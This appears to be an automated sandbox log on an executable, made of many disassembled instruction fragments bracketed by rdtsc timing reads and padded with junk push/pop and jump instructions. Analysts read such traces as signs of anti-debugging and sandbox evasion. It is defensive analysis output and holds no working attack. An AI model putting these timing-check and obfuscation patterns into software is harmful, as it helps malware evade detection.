Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE954B second address: AD1D83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jne 00007FDFF9160A40h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FDFF9160A28h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov dh, al 0x0000002c call dword ptr [ebp+122D236Ch] 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FDFF9160A38h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF9884 second address: AF990B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx ebx, si 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov ebx, dword ptr [ebp+122D36D6h] 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, dword ptr [ebp+122D1E41h] 0x00000028 mov eax, dword ptr [ebp+122D000Dh] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FDFF8F79158h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 call 00007FDFF8F79162h 0x0000004d sub dword ptr [ebp+122D219Bh], edi 0x00000053 pop edi 0x00000054 adc ebx, 2D2CB68Ah 0x0000005a xor di, 327Dh 0x0000005f push FFFFFFFFh 0x00000061 mov edi, dword ptr [ebp+122D34AEh] 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FDFF8F7915Ah 0x0000006f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF990B second address: AF9911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9B1A second address: 93F8F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jne 00007FDFF8F7916Eh 0x0000000e nop 0x0000000f mov cl, C9h 0x00000011 push dword ptr [ebp+122D0C79h] 0x00000017 je 00007FDFF8F7915Ch 0x0000001d mov dword ptr [ebp+122D33D9h], edi 0x00000023 call dword ptr [ebp+122D22A5h] 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122D1B86h], edi 0x00000030 xor eax, eax 0x00000032 jbe 00007FDFF8F79166h 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c jo 00007FDFF8F7916Bh 0x00000042 jmp 00007FDFF8F79165h 0x00000047 mov dword ptr [ebp+122D3592h], eax 0x0000004d mov dword ptr [ebp+122D1992h], esi 0x00000053 mov esi, 0000003Ch 0x00000058 xor dword ptr [ebp+122D1A21h], eax 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 add dword ptr [ebp+122D1B86h], esi 0x00000068 lodsw 0x0000006a add dword ptr [ebp+122D1A21h], edi 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 jmp 00007FDFF8F79169h 0x00000079 stc 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e sub dword ptr [ebp+122D1992h], ebx 0x00000084 nop 0x00000085 push eax 0x00000086 push edx 0x00000087 push ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9BD0 second address: AE9C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 31CCE185h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FDFF9160A28h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 movsx ecx, ax 0x0000002b call 00007FDFF9160A29h 0x00000030 jmp 00007FDFF9160A30h 0x00000035 push eax 0x00000036 pushad 0x00000037 jnp 00007FDFF9160A31h 0x0000003d jmp 00007FDFF9160A2Bh 0x00000042 jmp 00007FDFF9160A33h 0x00000047 popad 0x00000048 mov eax, dword ptr [esp+04h] 0x0000004c pushad 0x0000004d jmp 00007FDFF9160A2Ah 0x00000052 pushad 0x00000053 jmp 00007FDFF9160A2Eh 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFBF1C second address: AFBF2E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDFF8F79158h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9C5F second address: AE9C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push esi 0x00000009 jmp 00007FDFF9160A30h 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FDFF9160A2Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFBF2E second address: AFBF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F7915Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFC007 second address: AFC00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9D6B second address: AE9D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79166h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9D86 second address: AE9D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9D8B second address: AE9DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDFF8F79162h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9DAB second address: AE9DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9E21 second address: AE9E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9E25 second address: AE9E70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007FDFF9160A3Fh 0x0000000e xchg eax, esi 0x0000000f mov ecx, dword ptr [ebp+122D37D2h] 0x00000015 nop 0x00000016 jmp 00007FDFF9160A31h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f jng 00007FDFF9160A26h 0x00000025 pop eax 0x00000026 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFD07F second address: AFD0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79163h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDFF8F7915Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFD0A4 second address: AFD0A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE9FCB second address: AE9FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007FDFF8F7915Eh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA0FB second address: AEA101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA48C second address: AEA4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007FDFF8F79166h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFEEAD second address: AFEEB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFEEB3 second address: AFEEC9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDFF8F7915Ch 0x00000008 jnp 00007FDFF8F79156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B00D49 second address: B00D5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDFF9160A2Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFEEC9 second address: AFEECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA7F4 second address: AEA7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA8C3 second address: AEA8D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA8D4 second address: AEA8DE instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDFF9160A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA9C6 second address: AD28E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FDFF8F79158h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 call dword ptr [ebp+122D195Ch] 0x00000028 jng 00007FDFF8F79180h 0x0000002e push eax 0x0000002f push edx 0x00000030 jns 00007FDFF8F79156h 0x00000036 jc 00007FDFF8F79156h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AD28E9 second address: AD28F3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDFF9160A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1B795 second address: B1B7AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79164h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1B7AD second address: B1B7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BA68 second address: B1BA96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79163h 0x00000007 je 00007FDFF8F79156h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FDFF8F7915Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BBD1 second address: B1BBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BBD7 second address: B1BBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FDFF8F79166h 0x0000000c jno 00007FDFF8F79156h 0x00000012 jmp 00007FDFF8F7915Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BBF3 second address: B1BC1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jne 00007FDFF9160A32h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BF10 second address: B1BF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1BF15 second address: B1BF4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FDFF9160A34h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDFF9160A38h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1C0BB second address: B1C0C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1EA7B second address: B1EA83 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B1EA83 second address: B1EA9B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDFF8F7915Ch 0x00000008 js 00007FDFF8F79156h 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FDFF8F79156h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B28A19 second address: B28A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FDFF9160A36h 0x0000000b jo 00007FDFF9160A26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B27A49 second address: B27A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B28138 second address: B2813C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2813C second address: B28140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B28140 second address: B2814E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FDFF9160A28h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2875A second address: B28760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B28760 second address: B28772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDFF9160A2Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2E3B7 second address: B2E3D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDFF8F79168h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2CFAC second address: B2CFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D0F3 second address: B2D0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D511 second address: B2D517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D517 second address: B2D51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D51E second address: B2D52A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDFF9160A2Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D52A second address: B2D532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D532 second address: B2D536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D536 second address: B2D53A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D53A second address: B2D540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D6C5 second address: B2D6CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D826 second address: B2D82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D82C second address: B2D830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B2D9B4 second address: B2D9D2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDFF9160A39h 0x00000008 jmp 00007FDFF9160A33h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F4C second address: B34F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F52 second address: B34F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F56 second address: B34F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F5C second address: B34F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F62 second address: B34F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F6A second address: B34F95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDFF9160A35h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F95 second address: B34FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FDFF8F79156h 0x0000000a jmp 00007FDFF8F79160h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B35114 second address: B35118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B35118 second address: B3511E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3511E second address: B35124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B35124 second address: B35130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B376D9 second address: B376FE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDFF9160A2Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDFF9160A30h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B376FE second address: B37713 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B37713 second address: B3771D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3771D second address: B37721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AAA3D9 second address: AAA3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDFF9160A26h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AAA3EB second address: AAA403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FDFF8F7915Fh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AAA403 second address: AAA409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AAA409 second address: AAA40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AAA40F second address: AAA413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B37468 second address: B37472 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDFF8F7915Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3C7C7 second address: B3C7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
